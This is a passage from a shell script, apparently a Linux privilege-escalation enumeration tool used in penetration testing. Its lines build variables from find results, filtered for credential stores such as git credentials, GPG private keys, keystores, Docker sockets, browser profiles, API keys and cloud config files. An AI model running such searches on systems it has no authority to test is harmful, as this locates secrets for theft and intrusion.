"$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) 864 PSTORAGE_VIRTUAL_DISKS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.vhd$|.*\.vhdx$|.*\.vmdk$" | sort | uniq | head -n 70) 865 PSTORAGE_FILEZILLA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) 866 PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) 867 PSTORAGE_SPLUNK=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "passwd$" | sort | uniq | head -n 70) 868 PSTORAGE_GIT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.git-credentials$" | sort | uniq | head -n 70) 869 PSTORAGE_ATLANTIS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "atlantis\.db$" | sort | uniq | head -n 70) 870 PSTORAGE_GITLAB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/lib' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) 871 PSTORAGE_PGP_GPG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'README.gnupg|/usr/share/|/usr/lib/|/lib/|/man/' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pgp$|.*\.gpg$|.*\.asc$|secring\.gpg$|pubring\.kbx$|trustdb\.gpg$|gpg-agent\.conf$|secret\.asc$|private-keys-v1\.d/.*\.key$|.*\.gnupg$" | sort | uniq | head -n 70) 872 PSTORAGE_CACHE_VI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) 873 PSTORAGE_DOCKER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$|dockershim\.sock$|containerd\.sock$|crio\.sock$|frakti\.sock$|rktlet\.sock$|\.docker$" | sort | uniq | head -n 70) 874 PSTORAGE_FIREFOX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) 875 PSTORAGE_CHROME=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) 876 PSTORAGE_OPERA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) 877 PSTORAGE_SAFARI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) 878 PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) 879 PSTORAGE_FASTCGI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) 880 PSTORAGE_FAT_FREE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "fat\.config$" | sort | uniq | head -n 70) 881 PSTORAGE_SHODAN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "api_key$" | sort | uniq | head -n 70) 882 PSTORAGE_CONCOURSE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.flyrc$|concourse-auth$|concourse-keys$" | sort | uniq | head -n 70) 883 PSTORAGE_BOTO=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.boto$" | sort | uniq | head -n 70) 884 PSTORAGE_SNMP=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) 885 PSTORAGE_PYPIRC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | 